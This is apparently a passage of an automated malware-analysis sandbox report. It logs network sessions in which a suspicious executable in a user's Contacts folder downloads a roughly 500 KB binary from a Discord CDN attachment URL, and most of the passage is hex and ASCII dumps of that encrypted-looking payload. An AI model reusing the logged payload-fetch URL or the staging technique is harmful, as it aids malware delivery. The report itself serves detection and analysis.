6a 14 5a 48 60 9f 7f 12 0e 72 e8 75 03 33 d6 44 01 a8 b8 f7 ca 9f 2f 51 67 90 03 9c 68 ef 87 35 cc 96 5c 3c 0b fb 1e d7 5a a6 6e 3f ce 05
                                                                                              Data Ascii: Jb|:+?=s@0d}\IKLnseJZFhXAEP)L:~jDuxGPVH:_Q$qXG7&HitGRgUJe4a`O_Z<$8oa+?XBBb7gjZH`ru3D/Qgh5\<Zn?
                                                                                              2022-01-28 18:02:09 UTC561INData Raw: 47 12 0a f5 d1 75 88 39 ee 3f fd e6 2a 3f fd f6 91 a8 8b d1 ce 95 da 1c 92 9f 38 6b 6e b1 a3 17 6f 7d b9 73 00 db 8e 0f f5 38 93 d1 51 68 64 dc 11 c0 90 a7 f1 c3 75 cc 6b a2 83 53 31 da 61 30 23 c6 a1 aa 96 1b a1 f9 db 8e 48 94 98 62 d7 84 2f d4 fc 63 5a c2 ce ed bd 41 67 07 0c 9c 1e 4d 55 58 f7 9f fe 67 1c 23 a5 87 b6 af 70 9e 05 1b d8 54 b5 2d cf 6f 79 92 53 49 17 87 ee 4b 7f c7 31 bb 73 d7 83 ab 6b 6e e6 4f 52 cd 0f e8 52 e1 ca e4 5d 4a ae bf 3e 7b ab fb 99 e5 9b 26 45 0d 4b 48 ec 3a 46 ef ba b9 01 02 99 e5 9e 29 bd 41 34 2d cf 6f 79 92 53 31 d9 8d be c4 c3 09 73 83 ac 95 da 0c fa 5e cd 6a ec 3a 70 fb e1 9e 71 7e 1f ab 13 8c 43 08 f0 44 8a 3e 03 63 4a c2 a9 60 bb 4e d0 a1 ff e1 e6 2b da 08 f0 44 8a 3e 7b 98 62 d7 84 2f d4 fc 63 5a c3 51 2c 4c 9f f4 4f
                                                                                              Data Ascii: Gu9?*?8kno}s8QhdukS1a0#Hb/cZAgMUXg#pT-oySIK1sknORR]J>{&EKH:F)A4-oyS1s^j:pq~CD>cJ`N+D>{b/cZQ,LO


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2192.168.2.349747162.159.130.233443C:\Users\user\Contacts\Tdfgwnfyyv.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2022-01-28 18:02:46 UTC562OUTGET /attachments/935207028299796504/936481003038449725/Tdfgwnfyyvslxmhqyfimidqqywchnji HTTP/1.1
                                                                                              User-Agent: 20
                                                                                              Host: cdn.discordapp.com
                                                                                              Cache-Control: no-cache
                                                                                              2022-01-28 18:02:46 UTC563INHTTP/1.1 200 OK
                                                                                              Date: Fri, 28 Jan 2022 18:02:46 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 514560
                                                                                              Connection: close
                                                                                              CF-Ray: 6d4c22385e905c8c-FRA
                                                                                              Accept-Ranges: bytes
                                                                                              Age: 30053
                                                                                              Cache-Control: public, max-age=31536000
                                                                                              Content-Disposition: attachment;%20filename=Tdfgwnfyyvslxmhqyfimidqqywchnji
                                                                                              ETag: "f493f19d3321c61c6a854faf08b9664e"
                                                                                              Expires: Sat, 28 Jan 2023 18:02:46 GMT
                                                                                              Last-Modified: Fri, 28 Jan 2022 04:41:10 GMT
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              x-goog-generation: 1643344870150958
                                                                                              x-goog-hash: crc32c=09/Jdw==
                                                                                              x-goog-hash: md5=9JPxnTMhxhxqhU+vCLlmTg==
                                                                                              x-goog-metageneration: 1
                                                                                              x-goog-storage-class: STANDARD
                                                                                              x-goog-stored-content-encoding: identity
                                                                                              x-goog-stored-content-length: 514560
                                                                                              X-GUploader-UploadID: ADPycduHCmb3LIfL2HH4XBq8eRR0n39PUKp2MeqZwSE8DOng62cOfzZ1Kz-CCFAHvwp8mOq3bGQUC_Ncitc9O8DBsdE
                                                                                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PM0BluOcqyPPtcJCsvh09MtwiG%2Bm0zJoiQ0QKfhMBnYVX1cNJBvedspHAsqb2ZdGxblCxUtChYGAi33Ch8I2TXjWD8ZmzCtMErNYwlosQYyBplb9vogWBSOUaUzDUu0lNGdg4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              2022-01-28 18:02:46 UTC564INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                              Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                              2022-01-28 18:02:46 UTC564INData Raw: 06 a5 4a de 52 ef 92 0b 20 69 27 89 f8 1d e7 fd a1 b7 7b dc 55 77 dd cb 3d bf 08 b9 73 c7 1a 4e e3 ed f4 0b 3c 37 b9 6f 21 f7 98 2b 8e 0c bb 6c b6 e1 d7 c0 8d 87 e6 73 db c9 2e 1b e5 ec 7b c8 9a 29 8c 07 29 84 7f fa 06 ac db c7 1f ef 83 fc 24 76 42 c1 0f c3 01 06 b3 60 9c 25 fe 2c 0d 2d 88 77 c4 97 a4 c0 99 bd 19 db c0 80 60 96 1c 73 c4 9d a6 c2 8a 7f f2 11 df de 58 f7 92 17 d6 51 6b 20 67 20 6a ad 48 cc b0 e7 e3 ea 71 3a 31 89 fb af 54 f7 92 12 5a 9b b2 e2 6e bf 02 a5 42 d5 38 25 f3 88 7d dc 41 5a 9b ad 56 f1 83 e8 71 2e 15 df d0 b6 eb f6 04 be 9c 2b 84 66 a6 c2 8f 9b ad 56 f1 83 e8 71 2e 0a ad 5f 1e 61 11 c3 10 55 71 30 1e 6c b5 6c a1 a1 a1 be 8a 77 c9 24 79 c2 89 f2 00 9f b0 e1 ce b5 75 cf 21 f9 9f b0 e1 ce aa de 5f 14 4b 5d 1a 46 d7 c3 1f e2 64 98 23
                                                                                              Data Ascii: JR i'{Uw=sN<7o!+ls.{))$vB`%,-w`sXQk g jHq:1TZnB8%}AZVq.+fVq._aUq0llw$yu!_K]Fd#
                                                                                              2022-01-28 18:02:46 UTC565INData Raw: 5a 92 0e 9c 0d 23 db e6 49 74 66 81 f7 bc d5 13 d9 e8 64 88 5d 6a 81 f5 f1 a1 92 3a 1b cb 3e 25 db db dd b3 45 5e a3 ae ce 8f 99 8e 2b a2 1b cf 3c 2b a0 21 d8 51 72 51 7f cf 0e 91 b4 8a 52 c9 40 d2 aa f7 80 7f ca 83 c4 bb 1c 03 05 03 38 39 88 62 bb 67 0f d9 a9 53 58 dc 45 6a b7 62 b0 c3 3a 23 dd fb be a5 58 ed ef 90 22 5e 9d 8b a3 a3 ad 4b 7a 4a c9 32 31 86 65 0f d7 d2 91 8b 9a 09 11 d5 29 a5 62 b5 46 d0 9c 05 37 84 42 e6 49 7d c9 0e a1 93 86 64 b8 d5 2f 8a 68 83 f1 9a 3a 1b cd 04 b9 5e ae fb 85 dc 72 62 bb 50 c4 8d 98 01 0c ae c0 9d b1 48 f8 37 8a 63 3d 9a 07 06 89 d8 5c 9a 36 08 a2 17 ca 89 e9 e9 dc 78 76 5f 30 04 81 c6 b2 f5 b7 69 0a a8 d5 2d ef 97 80 79 cf 0e aa f7 b7 56 d9 d8 67 44 ec 51 42 d1 14 52 f0 25 d8 51 41 59 28 19 f4 2d a4 e7 cb 34 0b 2c 22
                                                                                              Data Ascii: Z#Itfd]j:>%E^+<+!QrQR@89bgSXEjb:#X"^KzJ21e)bF7BI}d/h:^rbPH7c=\6xv_0i-yVgDQBR%QAY(-4,"
                                                                                              2022-01-28 18:02:46 UTC567INData Raw: 12 2a 25 e9 dc 41 57 59 12 61 36 0e 98 0c a9 53 5b 13 e4 73 dd c2 9d 82 4b 72 64 fc 0f e5 88 6b 33 b9 61 0e 97 80 4c f7 f6 74 60 b9 6c a3 98 39 82 71 15 ca c3 0c 93 b7 66 85 ea 65 38 08 9b b9 5f 38 34 00 80 77 df cb 09 1e 78 74 64 81 f4 1c 45 52 fd b4 c7 04 b7 62 82 7c 7c 41 59 2e 30 05 3e 1b c0 ab 78 4f 48 fd b9 5a ae f8 3b 99 b1 4c c1 21 e3 f3 a8 ea 65 01 08 94 05 35 b9 5c a4 ef 9d 86 57 5b 21 dd f0 26 51 40 ed e3 fd 85 e3 f7 8d 92 0d 17 fb 8f a8 d6 66 80 44 e1 fc 07 36 34 30 39 bc d4 a1 93 80 7f cc 81 c1 1f cb 36 01 3f 97 b0 c6 83 cf 32 02 b3 07 38 0b 25 e7 cc bd 26 5c ac f4 1e 48 b4 cc 83 c2 9a 06 b6 f1 a6 e4 73 ee 64 b4 f1 af 7f c9 06 8d 97 8a 6a 82 4c bf 1b f4 2e 0f d2 a8 de 7c 7a 72 64 8d 9b 89 dd cd 04 8e 2a 24 58 dd c3 3b 99 89 e9 d3 2e 06 8f eb
                                                                                              Data Ascii: *%AWYa6S[sKrdk3aLt`l9qfe8_84wxtdERb||AY.0>xOHZ;L!e5\W[!&Q@fD64096?28%&\HsdjL.|zrd*$X;.
                                                                                              2022-01-28 18:02:46 UTC568INData Raw: 6d 2f bc df f1 af 3d d8 61 3e 20 7c 7c 41 6e ad 73 d8 27 9d 86 56 ec 5d 11 d7 e3 c0 a2 2f bc d7 db ef 99 b6 fd b4 c6 b5 7d f9 b9 6a bf 15 f7 89 ef 90 23 ea 64 8c 16 42 e3 f8 02 8f a9 5c 9e 11 e6 49 7c 45 63 33 81 ca 8e 2b a8 e1 ca 8d 98 08 a3 ae ff 8a 6e a8 dd f7 8b 9c 31 b2 c9 0e a0 1e 4b 7c 7e 72 63 38 07 01 33 80 7a 76 59 14 54 e7 f3 a6 ea 5b 26 60 b5 4f 46 e4 47 76 50 fb b0 ce bf 2d 92 39 bb 67 0a 9c 0a a1 99 b6 c8 bc d5 2f b2 fe 0b 25 e4 77 ad 4d 41 5f 0d 1c 76 6c 90 2a 26 6c 91 f0 22 58 d0 a6 e7 f0 1a 7f c0 9f 99 be ac ce 85 d3 11 e1 f8 08 9a 33 b0 c6 f8 04 b3 46 d2 a7 56 ed d7 e4 42 e1 cf 32 3f 9c 32 32 34 03 00 bb 5f 00 b1 48 f8 0c 9b be 90 2a 67 09 21 90 28 29 ac fe 02 ba e7 cc bd 12 2a 25 e9 dc 41 57 59 12 61 36 0e 98 0c a9 53 5b 13 e4 73 dd c2
                                                                                              Data Ascii: m/=a> ||Ans'V]/}j#dB\I|Ec3+n1K|~rc83zvYT[&`OFGvP-9g/%wMA_vl*&l"X3FVB2?224_H*g!()*%AWYa6S[s
                                                                                              2022-01-28 18:02:46 UTC569INData Raw: ba 26 90 51 aa 28 5b cd 14 1d 39 12 09 92 a3 68 b7 d4 cc f3 77 27 2c e2 d2 7d cb f3 67 79 15 26 31 54 e9 65 b3 ac 7d 81 4c 11 da 8c 03 69 f1 a0 13 ed ed 4b 8e 9e e4 f5 b8 3d 38 68 6c 35 b7 b6 67 62 56 56 b1 6d 21 a3 6a 26 63 c4 21 ec aa dc 1d 25 3b ae fc 01 da 2e 8b bf dd 4d 37 6d d3 1d 33 69 67 0c f8 d4 43 5c 4c 3f f1 40 65 46 64 47 aa f9 d7 85 4c f2 71 a3 a3 9f 67 65 8d ce 6a 48 99 25 0a 96 d7 79 98 ac 63 3f 7b 33 b7 ab 1e e5 71 7b 95 90 f5 88 33 e2 c1 20 3f cc 4a fd d8 77 85 a2 36 66 a5 e8 66 dc 34 6b 74 4b 57 1f a7 0d 3a c0 47 60 9d 83 b6 32 fd 8a ab 6e 60 fb a4 d4 f6 2b ea 21 22 4e b2 3c 5c cb fc 12 1b 3a 0c e9 de a6 97 60 33 80 b2 1a 42 04 4d 78 cc 76 80 92 5c 17 b5 2d 73 8f 5d 26 fa 9f 6d c9 65 d1 92 20 d3 f8 bb 28 d6 ba de 08 fe 89 df 51 f1 ae f9
                                                                                              Data Ascii: &Q([9hw',}gy&1Te}LiK=8hl5gbVVm!j&c!%;.M7m3igC\L?@eFdGLqgejH%yc?{3q{3 ?Jw6ff4ktKW:G`2n`+!"N<\:`3BMxv\-s]&me (Q
                                                                                              2022-01-28 18:02:46 UTC571INData Raw: 73 24 95 2f a2 f7 49 7a 46 e2 72 35 a8 88 42 08 79 cb 30 34 d2 97 80 5a b0 20 ba d7 e0 44 87 ea 63 3d 8b 43 96 04 bb 58 30 b0 4e d2 d0 76 39 87 d2 a9 ca cf 45 37 90 c4 96 08 a2 11 78 cc 26 cb 55 a5 3f 93 b0 f3 6b 65 48 4d 50 37 d1 2d ab 4d 3a 6f 65 41 75 19 af 7b ce 85 5e b6 d5 f2 3e e4 5a ab 7e 4c 63 86 e9 0f fb 79 d9 d1 12 56 50 d4 8c d3 07 f0 08 d0 9f 91 19 9a 69 ba 91 4e df cb 0c a5 98 f9 57 8b bd cc c0 a0 10 64 d9 87 bd 5a b2 21 c8 8f a9 5d 71 e1 14 d7 af 82 5c a0 1d ca e3 b6 b9 33 ee a4 fa 3b a7 64 62 c3 50 67 10 8e 6a 80 49 43 83 17 30 4b 33 4e d1 25 d4 9e da 24 49 3a 00 44 f8 03 0b 2d 0c a1 aa ed d2 68 8c 22 5f 0c 13 55 f4 f5 f7 55 55 62 89 d6 72 48 af b0 89 3b d3 12 5e aa 08 3e b7 57 15 0d 1f cc 86 14 1f a3 eb a1 d7 0c 91 80 75 e6 bd de 8a 3f d2
                                                                                              Data Ascii: s$/IzFr5By04Z Dc=CX0Nv9E7x&U?keHMP7-M:oeAu{^>Z~LcyVPiNWdZ!]q\3;dbPgjIC0K3N%$I:D-h"_UUUbrH;^>Wu?
                                                                                              2022-01-28 18:02:46 UTC572INData Raw: a4 2e 27 e8 aa ec a6 b8 ee 6c ac 74 a5 a2 89 94 df d1 10 69 08 bd ab f6 23 c0 55 7b c0 a0 21 28 ca 6e 95 f7 58 97 8e 2a 2e bc 96 2f ec 12 9a 4b 4a cc b7 1f 02 54 31 a9 83 dc 75 da 53 5e f0 7c ad 35 69 46 d8 65 3e 47 eb 5c ea 13 0a c5 3c 13 e9 e5 4a 66 de 6b f1 b2 f5 b3 79 8a 55 6f 1c 54 34 43 5c 96 39 30 33 8a 49 6e 7d bf 24 18 70 c0 3a 98 15 bc 25 e2 76 65 0e 69 ab da 69 1d 22 50 fe 0a a3 90 09 45 a7 7c 84 4e c7 0a 99 f9 da 0c f5 ff 7a 4f 06 8c 16 7b a1 c6 26 47 92 3b a5 68 8f 53 e9 67 33 f1 54 d3 1f cc 8f 2b 06 30 e0 3d 64 be 9e 1a 42 44 41 c5 af 6f f5 85 dc 4d 01 8b d1 6d c9 0f 04 ea 56 e4 71 21 fe 5c 2e 7b 12 01 09 27 94 25 f7 ef 1d d0 7d 8b 97 b6 fa 4b 3f de 80 5d d6 16 72 62 b6 61 02 b7 4c e7 2c 5e ac f4 26 ef eb c0 51 02 7f bf 25 9a 3a f3 06 3a 15
                                                                                              Data Ascii: .'lti#U{!(nX*./KJT1uS^|5iFe>G\<JfkyUoT4C\903In}$p:%veii"PE|NzO{&G;hSg3T+0=dBDAoMmVq!\.{'%}K?]rbaL,^&Q%::
                                                                                              2022-01-28 18:02:46 UTC573INData Raw: a9 5d d1 a5 75 04 97 7e 3b a7 6d 2a 06 f0 fa 24 4f b7 4f 4c c9 08 d0 7e c4 10 72 9f ae ff 86 67 55 74 39 2e 2b 52 fb b5 4a c6 9c 9a 66 86 49 8a 60 89 d1 10 f2 e5 a0 23 9d 71 5e 93 bc e0 c9 71 5a 57 47 9f a6 e3 c4 b2 23 fb 2f 9d 9e f5 b5 73 e1 cd 0e a9 17 f5 fa c1 29 a1 93 b9 af 60 37 5c f8 c2 ee 55 62 ba 9e 28 68 0a 81 2c 49 48 f9 8f bb 72 18 1e 07 fd fc 38 05 0a eb 4f 9b 97 90 d1 62 82 42 d0 64 b2 e5 dc 7e 80 34 0f ee 63 de fd 2d 6f 5f d3 7a 42 db e4 b6 54 d7 0a dc 96 41 61 01 39 34 45 85 a2 52 32 5b 21 de 36 ad 4d 01 17 b9 bf 56 e3 f2 27 68 82 b6 bc 90 c6 19 cf 02 80 6e 93 37 4a e3 20 f7 b0 ca 83 ac 0a 03 81 d6 9b 30 01 37 bd 42 80 d7 b3 00 43 dc 44 d4 a2 1a 99 2a e0 69 e2 8c 2f ba dd 34 62 fc f3 eb 27 6d 2e 01 02 a5 13 20 05 1d 2d 74 59 21 ef 71 3b a9
                                                                                              Data Ascii: ]u~;m*$OOL~rgUt9.+RJfI`#q^qZWG#/s)`7\Ub(h,IHr8ObBd~4c-o_zBTAa94ER2[!6MV'hn7J 07BCD*i/4b'm. -tY!q;
                                                                                              2022-01-28 18:02:46 UTC575INData Raw: 89 de 77 f5 18 54 62 f1 41 60 b7 57 5e 89 86 7e c0 b4 35 f6 0f e0 45 cc 2a f7 06 9c eb ba ee 61 31 0a 76 3a 06 92 d8 02 8c 63 33 92 a7 8d 68 ca 79 97 b9 59 11 39 aa 2b 0f f6 d0 f2 1d c4 85 fa 75 39 ce 98 fc 6d 1c 72 6c c4 ab 9b da 22 a2 63 06 8c 16 14 76 45 d1 0f 02 f4 16 7f ca 48 1f b9 6d 5b d6 d5 15 f6 33 86 4d 73 2f f2 d5 a1 ac fe 34 6b 61 7d 32 2e de d6 60 8e 68 39 87 39 e3 cc 6e 27 a7 55 62 43 74 bf 81 8e c2 60 81 f3 98 d1 44 ee 8e 3e f4 f4 15 c7 0e 17 3f ba c3 28 de a4 eb d5 1e 06 e7 3c 23 cd eb 18 74 67 0d 1a 5f 7d 00 f5 4f 9e 16 34 3c 74 8b 2a ec 12 89 08 94 38 01 13 9c bc f1 bb b0 18 7f cc b5 83 ba 54 19 ba 23 b9 57 50 c4 db ed 54 27 b7 b1 ce 83 f0 15 65 fc f4 21 98 e6 d6 54 de 7c d1 af 95 87 c6 55 da 56 dd cf bc 01 44 df b3 be 26 6e a8 e9 41 1d
                                                                                              Data Ascii: wTbA`W^~5E*a1v:c3hyY9+u9mrl"cvEHm[3Ms/4ka}2.`h99n'UbCt`D>?(<#tg_}O4<t*8T#WPT'e!T|UVD&nA
                                                                                              2022-01-28 18:02:46 UTC576INData Raw: 7b f5 b9 56 f0 06 e7 60 bb 56 d3 2f d3 1e b6 79 07 91 cf fa 3e 04 9c 68 5f 34 3f 9f a1 ad 2c 30 4b a0 19 ca 81 f6 3f fc 0d fe a2 64 47 eb a8 07 3d c5 72 1c 9e 2b a4 e2 00 b0 ec 15 8a 93 80 71 25 dd f3 c0 a7 92 86 3b 7a fb f6 d4 43 09 ea 5c 88 1b b7 8b 98 36 0e a4 a1 b5 54 b7 95 8c 24 67 06 b0 b1 76 93 1d ac 01 a9 0d e6 7a 2d ba b1 85 d8 6a 8c 12 2a 71 54 bc 10 64 b1 40 d1 23 b1 41 8a f7 d6 8b 39 f2 c2 a9 46 fe 6b c8 88 67 0d 2e 72 47 69 70 57 53 52 f3 92 0e f6 3e ff 2e 44 0b 8b dc 9a 06 aa eb b2 18 7c 44 ee 6d 27 80 08 e7 15 c3 3c 15 cf 08 f6 32 db 48 89 25 11 81 2d 90 31 f0 47 b7 53 5f 3a 16 47 51 14 0f 33 f7 f6 32 00 b8 af 76 ab c5 5c a8 d7 d9 e8 ad dd 85 b5 a0 79 f3 ec 5c 41 c3 4c 4f 5c 5c 2c 4f b4 6f 7d 95 e9 27 d5 7f ae fd b7 7b ee 30 d5 5d 74 5a c1
                                                                                              Data Ascii: {V`V/y>h_4?,0K?dG=r+q%;zC\6T$gvz-j*qTd@#A9Fkg.rGipWSR>.D|Dm'<2H%-1GS_:GQ32v\y\ALO\\,Oo}'{0]tZ
                                                                                              2022-01-28 18:02:46 UTC577INData Raw: 8b 94 3a b1 c1 7e 1a 93 b0 66 ee 34 54 dd 8c ef a9 5a ae fa 30 d7 5b 7b 9c 58 98 7c 56 9b fe b3 4c 13 63 05 cb 3c 1a 45 5f 36 ff 01 da 0c ba 97 f6 8c 2e c2 20 79 a1 95 c6 67 0c 9d 87 e9 d3 b4 71 f5 ce 65 b7 52 79 63 58 21 62 b9 73 d7 97 5d 12 58 ee 6a ba 3b 28 77 8e 09 26 22 70 89 b7 8d 9a 0a 9c 33 b3 ac 76 90 49 20 57 24 e1 ce 79 71 1b 03 02 b4 ce b0 fd 7d 76 9e 72 44 fc 6f aa cf e4 c7 0d 32 3b e5 04 87 d2 a5 57 60 15 49 84 2e 8f 05 6e 75 4d 4d a8 4e c4 93 84 35 58 d7 e8 6d 1e 7d 04 0e bc b4 3a b7 51 60 b0 ab b1 7f fe 0b 25 e4 b3 f0 7b 95 e4 09 71 48 ec 30 80 00 4c 58 dd 27 94 35 b0 c1 16 8e 8d 8a 25 f4 69 68 29 ec bc 75 e6 6e a4 92 f5 84 4a ba e4 70 2b 33 e4 29 5e 84 3e a1 16 41 5c 78 1a 8a d7 e4 27 4b 9d 8d e6 42 0b 1e 1e 4a 97 46 d4 ac f8 0b 58 3c bd
                                                                                              Data Ascii: :~f4TZ0[{X|VLc<E_6. ygqeRycX!bs]Xj;(w&"p3vI W$yq}vrDo2;W`I.nuMMN5Xm}:Q`%{qH0LX'5%ih)unJp+3)^>A\x'KBJFX<
                                                                                              2022-01-28 18:02:46 UTC579INData Raw: 5d 50 be c9 a3 e4 97 4d 61 95 b7 de eb 75 b7 dc 97 89 52 8c d5 b8 61 55 ad 7e d9 d9 0e 5f 40 49 39 64 46 86 c6 44 d7 d7 1b 40 e7 36 13 4d 04 79 c1 59 9b e1 0d 21 70 d4 6a 3d f1 40 02 48 91 be ad f4 53 64 ca 1b c6 8c c9 e6 81 b6 ff 8f 25 46 e9 18 e7 f1 9a fc 2d 63 50 f6 3d 71 02 e4 f9 9e f5 37 ee b6 25 e4 46 dd c7 f7 66 2c 40 43 0d d0 0b a1 a6 49 17 13 46 42 d5 dd 5b 87 d8 1e ed a1 4c 77 56 dc ca ee ac 52 7d 9b 4b dc dc 74 1f 7a 0c 43 f9 0b 6b be ca 72 c7 88 30 e5 7d 4d 3c 76 c9 65 e3 46 40 93 19 93 45 cc 25 bc 13 42 57 3b f3 05 70 59 b2 7b 90 90 5c 59 8d 09 6c 41 d3 a0 79 9d 24 20 99 06 38 7a d4 f9 5f 9b 3a 7d 01 12 0f 02 bc b9 ef 4a 4d 02 47 ef 95 14 a3 7e 1f 73 18 02 30 e4 36 b8 60 6f 91 12 5e 00 11 c2 c7 33 b9 59 d3 39 38 3d 90 18 47 b0 11 eb b2 64 d7
                                                                                              Data Ascii: ]PMauRaU~_@I9dFD@6MyY!pj=@HSd%F-cP=q7%Ff,@CIFB[LwVR}KtzCkr0}M<veF@E%BW;pY{\YlAy$ 8z_:}JMG~s06`o^3Y98=Gd
                                                                                              2022-01-28 18:02:46 UTC580INData Raw: f2 7b 66 ef 99 b6 fc 77 0a 66 3c 1c 43 5a c0 26 a1 71 91 88 54 d2 9d 36 9b 8a 5c 16 65 ab 78 72 6d 19 75 0c 7e c7 38 36 0f 85 98 db db de 48 c2 aa 77 18 98 9d 8a 53 51 7d 75 75 ed d0 73 4e a1 71 37 9f e2 43 5a 04 db 1c bb c4 b6 c2 aa 9c 8d 3c 01 ee 7f 0c a1 61 fb d3 e2 90 0b f8 f3 87 40 01 e5 e0 e3 8d 41 cb 0c da 69 a5 60 47 82 fc 33 88 66 77 1c e0 4d 49 75 06 55 96 a5 98 d9 0b 0d d4 76 c6 10 ab 71 e2 92 cb e7 0d f4 c7 eb 2c 31 77 bd bf fc d3 d4 1b 91 6e 8b 7b c7 c6 6f 5d c9 d9 e2 c7 d4 42 e1 22 5c aa 84 4f 45 65 74 c2 a2 29 4a b0 1c a9 3f 3d e5 58 58 37 bd ab 66 79 12 fb bd 15 c1 a4 78 46 32 b4 f5 83 ad 5d 50 26 bd a6 d2 9e 24 22 5d ea 93 86 59 c5 ed 9f f6 d2 43 6b fa d1 40 1b fa 36 3e 1f 5d 18 39 fa d5 8d b0 4a 6a b8 b3 d6 5f 70 09 22 6e 1c 49 4c 09 f7
                                                                                              Data Ascii: {fwf<CZ&qT6\exrmu~86HwSQ}uusNq7CZ<a@Ai`G3fwMIuUvq,1wn{o]B"\OEet)J?=XX7fyxF2]P&$"]YCk@6>]9Jj_p"nIL
                                                                                              2022-01-28 18:02:46 UTC581INData Raw: c5 56 d2 a3 f0 92 45 f0 6d ff 12 18 47 44 ee 62 8a 63 09 5d 54 d1 1c aa ec 33 55 bc 47 1c 4f 4b 86 b5 10 0a a1 a2 7a 8d 74 6b ea b7 d7 8f a9 6e f7 4c 8a 32 0e ae 61 48 75 7a f7 bb 68 e3 cb 03 fb 9d e7 c5 dd 18 18 7f f9 3b 0d 83 59 6e d6 53 5c 4e 73 50 43 f3 53 dd 04 b2 30 ec 3e 9d 7f 91 a5 15 f0 26 a5 5c 1b b5 bc c0 ca ff 8d a0 26 f8 4d 54 3a 6c ff be a5 5f 00 84 7a cc aa 79 71 4e 3f 7f 7d 92 3d 90 5f 47 65 d5 6e ed d7 e8 65 3e 2f 80 78 00 ba e8 60 5e 4f 30 4b 76 50 91 b0 f5 82 0a 7b b1 25 20 b6 a0 74 6d 17 7f 4c ee 56 0f f8 78 b3 1d 64 95 21 50 2e 08 1c b6 6c f1 2c ef dd 94 78 e5 f8 3f 75 e0 3b 16 05 91 8b 27 a6 73 d7 4b c2 95 fa c5 d2 2d d0 95 81 a5 e2 7b 48 22 5a ab e6 4a 73 8a aa 05 b0 a4 d1 11 96 aa fb 1a 76 54 e0 85 c0 18 22 62 82 7c 7c e7 57 4a 00
                                                                                              Data Ascii: VEmGDbc]T3UGOKztknL2aHuzh;YnS\NsPCS0>&\&MT:l_zyqN?}=_Gene>/x`^O0KvP{% tmLVxd!P.l,x?u;'sK-{H"ZJsvT"b||WJ
                                                                                              2022-01-28 18:02:46 UTC583INData Raw: 14 af 7d 95 c3 0f e8 d1 ff 09 69 89 30 72 0d f2 93 8b 93 84 a5 d6 0d ec 53 26 ad 02 89 da 58 56 7e 66 1b a4 d3 1c 78 f9 42 15 f5 87 e0 44 46 a9 1f 9b 5e a0 a5 62 00 bb 16 af 7e ea 61 a4 dc f7 5f e7 ff 1c b4 3c 11 ea 54 df c7 dd 6a 8b 95 07 16 ff fb b2 c4 8e 4b 9b 63 0e 9c 04 85 4e 43 87 33 bc d6 66 83 f7 18 f6 05 02 6f ba a7 fe 3c 96 54 24 b9 51 7a 70 97 f9 3e 29 88 c8 bc ea d4 dc e7 b5 a5 95 b3 42 d4 90 58 5e ed 23 4f 7b f2 d9 1f c9 37 bb 68 04 bf 05 88 6b 02 a5 f4 1d fb 86 d6 15 6d 7a e5 2a d3 d6 53 5b 19 cd 34 fa eb ec 51 31 e6 04 61 2b 62 32 c7 c5 0d 1f c7 0f 98 32 d6 e6 75 db 1a 89 0d 24 6d 17 f6 c7 72 18 0c ad a7 e2 4c c0 2e 02 70 02 8b 30 cc 68 b1 71 2b 95 cb 3f d8 e3 c8 b4 5f 3d 03 73 07 e1 fe 0f df f0 42 7d 13 18 a5 19 ca 87 23 8c f4 46 e3 cd 3d
                                                                                              Data Ascii: }i0rS&XV~fxBDF^b~a_<TjKcNC3fo<T$Qzp>)BX^#O{7hkmz*S[4Q1a+b22u$mrL.p0hq+?_=sB}#F=
                                                                                              2022-01-28 18:02:46 UTC584INData Raw: 28 ce 40 fe 67 e7 34 37 ba e9 e4 36 03 92 b9 63 3d 0f e6 ae 67 1c de 96 de 70 db ec 64 d0 a4 95 4a 20 6b 75 13 1a 74 6c 94 3d 07 3f 44 6d 17 b7 d9 dc 94 fa 14 1c b2 29 ad 74 65 0d 71 25 7a e2 4b 74 88 4e bd b0 f0 c8 49 e1 c8 bf 15 69 eb 28 27 93 85 d4 e3 f2 40 63 04 b8 43 5d d9 1e d0 a6 eb 97 e4 a1 75 eb d7 e3 cb 87 dd b3 c5 05 00 1e 68 e6 b8 3d 11 ea 56 e8 2f 5b ca b9 6d 1c 76 fa 31 57 d9 ee 6f 29 01 35 e8 62 aa 03 89 e0 77 d1 a6 db e7 cf f1 40 7f 82 42 e1 19 07 9b 8d a6 e4 46 ba 43 28 2e d9 24 21 46 d2 f0 d7 04 81 f7 87 d8 15 f8 11 78 43 6e 1f f0 cc 05 e3 59 c6 55 5c a0 17 fa 47 45 97 07 0b 1a 90 ef d5 ed cb d4 ff 69 f4 17 ce b8 d7 77 e8 35 06 86 5a 44 0c 42 ed e2 4e c0 47 62 d6 1c 45 19 72 20 7a fc d7 1c af 75 e0 7f fc 9e 13 9f a7 81 4f 78 42 45 72 00
                                                                                              Data Ascii: (@g476c=gpdJ kutl=?Dm)teq%zKtNIi('@cC]uh=V/[mv1Wo)5bw@BFC(.$!FxCnYU\GEiw5ZDBNGbEr zuOxBEr
